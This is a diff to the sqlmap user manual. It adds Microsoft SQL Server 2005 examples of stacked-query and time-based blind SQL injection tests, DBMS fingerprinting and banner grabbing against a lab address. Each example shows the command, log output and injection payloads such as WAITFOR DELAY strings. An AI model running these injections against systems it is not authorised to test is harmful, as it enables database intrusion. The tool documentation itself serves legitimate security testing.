@@ -1791,6 +1791,21 @@ back-end DBMS: PostgreSQL
17911791stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
17921792</verb></tscreen>
17931793
1794+ <p>
1795+ Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
1796+
1797+ <tscreen><verb>
1798+ $ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
1799+ --stacked-test -v 1
1800+
1801+ [...]
1802+ back-end DBMS: Microsoft SQL Server 2005
1803+
1804+ [hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
1805+ [hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
1806+ stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
1807+ </verb></tscreen>
1808+
17941809
17951810<sect2>Test for Time based blind SQL injection
17961811
@@ -1839,6 +1854,23 @@ with stacked query syntax
18391854time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
18401855</verb></tscreen>
18411856
1857+ <p>
1858+ Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
1859+
1860+ <tscreen><verb>
1861+ $ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
1862+ --time-test -v 1
1863+
1864+ [...]
1865+ back-end DBMS: Microsoft SQL Server 2005
1866+
1867+ [15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax
1868+ [15:32:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax
1869+ [15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax
1870+ [15:33:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax
1871+ time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn'
1872+ </verb></tscreen>
1873+
18421874
18431875<sect2>Test for UNION query SQL injection
18441876
@@ -2221,6 +2253,27 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
22212253 html error message fingerprint: Microsoft SQL Server
22222254</verb></tscreen>
22232255
2256+ <p>
2257+ Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
2258+
2259+ <tscreen><verb>
2260+ $ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
2261+
2262+ [...]
2263+ [hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
2264+ [hh:mm:51] [INFO] testing Microsoft SQL Server
2265+ [hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
2266+ [hh:mm:51] [INFO] retrieved: 1
2267+ [hh:mm:51] [INFO] performed 13 queries in 0 seconds
2268+ [hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
2269+ [hh:mm:51] [INFO] retrieved: 5
2270+ [hh:mm:51] [INFO] performed 13 queries in 0 seconds
2271+ web server operating system: Windows 2003 or 2000
2272+ web application technology: ASP.NET, Microsoft IIS 6.0, ASP
2273+ back-end DBMS: active fingerprint: Microsoft SQL Server 2005
2274+ html error message fingerprint: Microsoft SQL Server
2275+ </verb></tscreen>
2276+
22242277<p>
22252278If you want an even more accurate result, based also on banner parsing,
22262279you can also provide the <tt>-b</tt> or <tt>--banner</tt> option.
@@ -2302,6 +2355,38 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
23022355[...]
23032356</verb></tscreen>
23042357
2358+ <p>
2359+ Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
2360+
2361+ <tscreen><verb>
2362+ $ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
2363+
2364+ [...]
2365+ [hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
2366+ [hh:mm:03] [INFO] testing Microsoft SQL Server
2367+ [hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
2368+ [hh:mm:03] [INFO] retrieved: 1
2369+ [hh:mm:03] [INFO] performed 13 queries in 0 seconds
2370+ [hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
2371+ [hh:mm:03] [INFO] retrieved: 5
2372+ [hh:mm:03] [INFO] performed 13 queries in 0 seconds
2373+ [hh:mm:03] [INFO] query: @@VERSION
2374+ [hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
2375+ Oct 14 2005 00:33:37
2376+ Copyright (c) 1988-2005 Microsoft Corporation
2377+ Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
2378+
2379+ [hh:mm:15] [INFO] performed 1343 queries in 11 seconds
2380+ web server operating system: Windows 2003 or 2000
2381+ web application technology: ASP.NET, Microsoft IIS 6.0, ASP
2382+ back-end DBMS operating system: Windows 2003 Service Pack 1
2383+ back-end DBMS: active fingerprint: Microsoft SQL Server 2005
2384+ banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0
2385+ version 9.00.1399
2386+ html error message fingerprint: Microsoft SQL Server
2387+ [...]
2388+ </verb></tscreen>
2389+
23052390<p>
23062391As you can see, from the Microsoft SQL Server banner, sqlmap was able to
23072392correctly identify the database management system patch level.
@@ -2369,6 +2454,21 @@ Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
23692454---
23702455</verb></tscreen>
23712456
2457+ <p>
2458+ Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
2459+
2460+ <tscreen><verb>
2461+ $ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
2462+
2463+ banner:
2464+ ---
2465+ Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
2466+ Oct 14 2005 00:33:37
2467+ Copyright (c) 1988-2005 Microsoft Corporation
2468+ Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
2469+ ---
2470+ </verb></tscreen>
2471+
23722472
23732473<sect2>Current user
23742474
0 commit comments